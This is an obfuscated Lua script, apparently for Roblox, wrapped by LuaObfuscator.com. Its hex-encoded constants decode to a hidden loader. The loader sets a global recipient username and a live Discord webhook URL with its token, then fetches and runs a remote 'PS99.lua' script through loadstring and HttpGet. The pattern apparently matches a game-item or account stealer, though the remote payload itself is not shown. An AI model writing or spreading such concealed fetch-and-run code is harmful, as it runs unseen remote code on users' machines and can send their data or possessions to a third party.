--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v85=v2(v0(v30,16));if v19 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v5(v85,v19);v19=nil;v96=1;end end else return v85;end end end);local function v20(v31,v32,v33)if v33 then local v86=0 -0 ;local v87;while true do if (v86==(0 -(0 -0))) then v87=(v31/((3 -1)^(v32-(2 -1))))%(((1686 -(68 + 997)) -((1825 -(226 + 1044)) + (278 -214)))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -((331 -(32 + 85)) + 713)))) ;return v87-(v87%(1 + 0)) ;end end else local v88=0 + 0 ;local v89;while true do if (v88==0) then v89=(879 -(282 + 595))^(v32-((1606 + 32) -(1523 + 114))) ;return (((v31%(v89 + v89))>=v89) and (1 + 0)) or (0 + (957 -(892 + 65))) ;end end end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==1) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 -0 ;end end end local function v22()local v36=(997 -(915 + 82)) + 0 ;local v37;local v38;while true do if (v36==1) then return (v38 * (606 -(87 + 263))) + v37 ;end if (v36==(180 -(67 + 113))) then v37,v38=v1(v16,v18,v18 + (5 -3) );v18=v18 + 2 + 0 ;v36=2 -1 ;end end end local function v23()local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(1 + 0)) then return (v43 * 16777216) + (v42 * (11394 + 54142)) + (v41 * ((596 -260) -80)) + v40 ;end if ((1187 -(1069 + 118))==v39) then v40,v41,v42,v43=v1(v16,v18,v18 + (6 -(3 + 0)) );v18=v18 + (8 -4) ;v39=1;end end end local function v24()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(792 -(368 + 423))) then v47=(4 -1) -2 ;v48=(v20(v46,19 -(10 + 8) ,76 -56 ) * ((444 -(416 + 26))^(102 -(1150 -(1020 + 60))))) + v45 ;v44=2;end if ((2 + 1)==v44) then if (v49==(0 -0)) then if (v48==((1861 -(630 + 793)) -(145 + 293))) then return v50 * (430 -(44 + 386)) ;else v49=3 -2 ;v47=1486 -(998 + 488) ;end elseif (v49==(651 + (6609 -5213))) then return ((v48==0) and (v50 * ((1 + 0)/(772 -(201 + 571))))) or (v50 * NaN) ;end return v8(v50,v49-(403 + 620) ) * (v47 + (v48/((1140 -(116 + 1022))^((743 -527) -(1911 -(760 + 987)))))) ;end if (v44==(0 + (1913 -(1789 + 124)))) then v45=v23();v46=v23();v44=3 -2 ;end if (v44==2) then v49=v20(v46,21,110 -(845 -(745 + 21)) );v50=((v20(v46,(307 + 584) -(814 + (123 -78)) )==(2 -1)) and  -(1 + 0)) or ((3 -2) + 0) ;v44=888 -(261 + 624) ;end end end local function v25(v51)local v52;if  not v51 then v51=v23();if (v51==(0 + 0)) then return "";end end v52=v3(v16,v18,(v18 + v51) -1 );v18=v18 + v51 ;local v53={};for v69=1 + 0 , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0 + 0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==(2 + 0)) then local v93=0;while true do if (v93==0) then v59=nil;v60=nil;v93=1;end if (v93==1) then v54=7 -4 ;break;end end end if (v54~=(2 -1)) then else local v94=1769 -(1749 + 20) ;while true do if (1~=v94) then else v54=1 + 1 ;break;end if (v94~=0) then else v57=nil;v58=nil;v94=1323 -(1249 + 73) ;end end end if (4~=v54) then else while true do if ((1 + 1)==v55) then v60=nil;v61=nil;v55=1148 -(466 + 679) ;end if (0==v55) then local v102=0;local v103;while true do if (0==v102) then v103=0;while true do if ((2 -1)~=v103) then else v55=1;break;end if ((0 -0)~=v103) then else local v152=1900 -(106 + 1794) ;while true do if (v152==0) then v56=0 + 0 ;v57=nil;v152=1;end if (1==v152) then v103=1 + 0 ;break;end end end end break;end end end if (v55==1) then local v104=0 -0 ;while true do if ((0 -0)==v104) then v58=nil;v59=nil;v104=1;end if ((115 -(4 + 110))==v104) then v55=586 -(57 + 527) ;break;end end end if (v55==3) then v62=nil;while true do local v105=1427 -(41 + 1386) ;local v106;while true do if (v105~=0) then else v106=0;while true do if (v106==1) then if (1==v56) then local v172=103 -(17 + 86) ;local v173;local v174;while true do if (v172==(0 + 0)) then v173=0;v174=nil;v172=1 -0 ;end if (v172==(2 -1)) then while true do if (v173==0) then v174=166 -(122 + 44) ;while true do if (v174~=(2 -0)) then else v56=6 -4 ;break;end if (v174==(1 + 0)) then for v183=1,v61 do local v184=0;local v185;local v186;local v187;local v188;while true do if (v184~=(0 + 0)) then else v185=0;v186=nil;v184=1;end if (v184~=2) then else while true do if (v185~=1) then else v188=nil;while true do if (v186~=(1 -0)) then else if (v187==(66 -(30 + 35))) then v188=v21()~=0 ;elseif (v187==(2 + 0)) then v188=v24();elseif (v187==3) then v188=v25();end v62[v183]=v188;break;end if (0~=v186) then else local v196=1257 -(1043 + 214) ;while true do if (v196==0) then v187=v21();v188=nil;v196=1;end if (v196==(3 -2)) then v186=1213 -(323 + 889) ;break;end end end end break;end if (v185~=(0 -0)) then else local v194=580 -(361 + 219) ;while true do if (v194==1) then v185=1;break;end if (v194==(320 -(53 + 267))) then v186=0 + 0 ;v187=nil;v194=414 -(15 + 398) ;end end end end break;end if (v184~=(983 -(18 + 964))) then else v187=nil;v188=nil;v184=2;end end end v60[11 -8 ]=v21();v174=2;end if (v174~=(0 + 0)) then else local v182=0;while true do if (v182==(0 + 0)) then local v190=0;while true do if (v190~=0) then else v61=v23();v62={};v190=1;end if (v190==(851 -(20 + 830))) then v182=1 + 0 ;break;end end end if (v182==1) then v174=127 -(116 + 10) ;break;end end end end break;end end break;end end end break;end if (v106==(0 + 0)) then local v162=0;local v163;while true do if (v162==(738 -(542 + 196))) then v163=0;while true do if (v163~=(0 -0)) then else if (v56==(1 + 1)) then local v177=0;local v178;while true do if (v177==(0 + 0)) then v178=0;while true do local v189=0;while true do if (v189~=0) then else if (v178==(0 + 0)) then local v193=0;while true do if (v193==(0 -0)) then for v197=1,v23() do local v198=0 -0 ;local v199;local v200;while true do if ((1551 -(1126 + 425))==v198) then v199=0;v200=nil;v198=406 -(118 + 287) ;end if (v198~=(3 -2)) then else while true do if ((1121 -(118 + 1003))==v199) then v200=v21();if (v20(v200,2 -1 ,378 -(142 + 235) )==(0 -0)) then local v203=0 + 0 ;local v204;local v205;local v206;local v207;while true do if (v203~=(977 -(553 + 424))) then else local v208=0 -0 ;while true do if (v208~=(1 + 0)) then else v203=1 + 0 ;break;end if (v208==0) then local v210=0;while true do if (v210==0) then v204=0;v205=nil;v210=1 + 0 ;end if (v210==1) then v208=1 + 0 ;break;end end end end end if (v203~=2) then else while true do if (v204==2) then local v211=0;local v212;local v213;while true do if (v211~=1) then else while true do if (v212==(0 + 0)) then v213=0;while true do if (v213==(0 -0)) then if (v20(v206,2 -1 ,2 -1 )==1) then v207[1 + 1 ]=v62[v207[9 -7 ]];end if (v20(v206,755 -(239 + 514) ,1 + 1 )==(1330 -(797 + 532))) then v207[3 + 0 ]=v62[v207[3]];end v213=1 + 0 ;end if ((2 -1)==v213) then v204=3;break;end end break;end end break;end if (v211==0) then v212=0;v213=nil;v211=1203 -(373 + 829) ;end end end if (v204~=(731 -(476 + 255))) then else local v214=1130 -(369 + 761) ;local v215;while true do if (v214~=(0 + 0)) then else v215=0;while true do if (v215~=(1 -0)) then else v204=1;break;end if (v215==0) then local v221=0 -0 ;while true do if (v221~=0) then else v205=v20(v200,240 -(64 + 174) ,3);v206=v20(v200,1 + 3 ,8 -2 );v221=1;end if (v221==1) then v215=1;break;end end end end break;end end end if (v204==(339 -(144 + 192))) then if (v20(v206,3,219 -(42 + 174) )~=1) then else v207[4]=v62[v207[4 + 0 ]];end v57[v197]=v207;break;end if (v204~=(1 + 0)) then else local v217=0 + 0 ;local v218;while true do if (v217~=0) then else v218=0;while true do if (v218~=(1504 -(363 + 1141))) then else local v222=1580 -(1183 + 397) ;while true do if (v222~=(0 -0)) then else v207={v22(),v22(),nil,nil};if (v205==0) then local v227=0 + 0 ;local v228;local v229;while true do if (1==v227) then while true do if (v228==(0 -0)) then v229=1933 -(565 + 1368) ;while true do if (v229==0) then v207[11 -8 ]=v22();v207[1665 -(1477 + 184) ]=v22();break;end end break;end end break;end if (v227==0) then local v231=0;while true do if (v231==(1 -0)) then v227=1 + 0 ;break;end if (v231~=0) then else v228=856 -(564 + 292) ;v229=nil;v231=1;end end end end elseif (v205==1) then v207[4 -1 ]=v23();elseif (v205==2) then v207[3]=v23() -((5 -3)^16) ;elseif (v205~=3) then else local v233=0;local v234;while true do if (v233==0) then v234=304 -(244 + 60) ;while true do if (v234~=(0 + 0)) then else v207[479 -(41 + 435) ]=v23() -((1003 -(938 + 63))^16) ;v207[4 + 0 ]=v22();break;end end break;end end end v222=1;end if (v222==1) then v218=1126 -(936 + 189) ;break;end end end if (v218==1) then v204=2;break;end end break;end end end end break;end if (v203~=(1 + 0)) then else local v209=1613 -(1565 + 48) ;while true do if (v209~=1) then else v203=2;break;end if (v209~=(0 + 0)) then else v206=nil;v207=nil;v209=1139 -(782 + 356) ;end end end end end break;end end break;end end end for v201=268 -(176 + 91) ,v23() do v58[v201-(2 -1) ]=v28();end v193=1 -0 ;end if (v193==(1093 -(975 + 117))) then v178=1876 -(157 + 1718) ;break;end end end if (v178==(1 + 0)) then return v60;end break;end end end break;end end end if (v56==0) then local v179=0 -0 ;local v180;while true do if (v179==(0 -0)) then v180=0;while true do if (v180==(1020 -(697 + 321))) then v56=2 -1 ;break;end if ((0 -0)~=v180) then else local v191=0 -0 ;local v192;while true do if (v191==0) then v192=0 + 0 ;while true do if ((1 -0)==v192) then v180=2 -1 ;break;end if (v192==(1227 -(322 + 905))) then v57={};v58={};v192=612 -(602 + 9) ;end end break;end end end if (1==v180) then v59={};v60={v57,v58,nil,v59};v180=949 -(245 + 702) ;end end break;end end end v163=1;end if (v163==1) then v106=3 -2 ;break;end end break;end end end end break;end end end break;end end break;end if (0==v54) then v55=0 + 0 ;v56=nil;v54=1899 -(260 + 1638) ;end if (v54==3) then local v95=0;while true do if (v95==(441 -(382 + 58))) then v54=12 -8 ;break;end if (v95~=(0 + 0)) then else v61=nil;v62=nil;v95=1 -0 ;end end end end end local function v29(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v71=v66;local v72=v67;local v73=v68;local v74=v27;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v90=0,v79 do if (v90>=v73) then v77[v90-v73 ]=v78[v90 + 1 ];else v81[v90]=v78[v90 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=5) then if (v84<=2) then if (v84<=0) then local v107=0;local v108;while true do if (v107==0) then v108=v83[2];v81[v108]=v81[v108](v13(v81,v108 + 1 ,v76));break;end end elseif (v84==1) then v81[v83[2]][v83[3]]=v83[4];else local v117=0;local v118;local v119;while true do if (0==v117) then v118=v83[2];v119=v81[v83[3]];v117=1;end if (1==v117) then v81[v118 + 1 ]=v119;v81[v118]=v119[v83[4]];break;end end end elseif (v84<=3) then local v109=0;while true do if (v109==2) then v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v109=3;end if (v109==0) then v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];if ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v65;else v81[v83[2]]=v65[v83[3]];end v109=1;end if (v109==1) then v75=v75 + 1 ;v83=v71[v75];v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v109=2;end if (v109==3) then v75=v83[3];break;end end elseif (v84>4) then if ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v65;else v81[v83[2]]=v65[v83[3]];end else v81[v83[2]]=v83[3];end elseif (v84<=8) then if (v84<=6) then local v110=0;local v111;local v112;local v113;local v114;while true do if (v110==0) then v111=v83[2];v112,v113=v74(v81[v111](v13(v81,v111 + 1 ,v83[3])));v110=1;end if (v110==2) then for v156=v111,v76 do local v157=0;while true do if (0==v157) then v114=v114 + 1 ;v81[v156]=v112[v114];break;end end end break;end if (v110==1) then v76=(v113 + v111) -1 ;v114=0;v110=2;end end elseif (v84==7) then v75=v83[3];else v81[v83[2]]();end elseif (v84<=9) then do return;end elseif (v84>10) then if (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end else local v123;local v124,v125;local v126;local v127;if ((v83[3]=="_ENV") or (v83[3]=="getfenv")) then v81[v83[2]]=v65;else v81[v83[2]]=v65[v83[3]];end v75=v75 + 1 ;v83=v71[v75];v127=v83[2];v126=v81[v83[3]];v81[v127 + 1 ]=v126;v81[v127]=v126[v83[4]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v127=v83[2];v124,v125=v74(v81[v127](v13(v81,v127 + 1 ,v83[3])));v76=(v125 + v127) -1 ;v123=0;for v149=v127,v76 do v123=v123 + 1 ;v81[v149]=v124[v123];end v75=v75 + 1 ;v83=v71[v75];v127=v83[2];v81[v127]=v81[v127](v13(v81,v127 + 1 ,v76));v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]();v75=v75 + 1 ;v83=v71[v75];v75=v83[3];end v75=v75 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403203O00682O7470733A2O2F6E782O6C2E6F6E652F7363726970742F50532O392E6C756103023O005F4703083O00557365726E616D6503063O006534726E656403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O392O353836313234382O3236393234362F5F5267584E54746B6A7353694670577149366331584A3573493966532D435A4B6A5234494D6B73796F77624C373677333678655A6B3162594E565158325138745F37684500143O0012043O00013O00260B3O000B000100020004073O000B0001001205000100033O00120A000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O0013000100260B3O0001000100010004073O00010001001205000100073O00300300010008000900122O000100073O00302O0001000A000B00124O00023O00044O000100012O00093O00017O00",v9(),...);
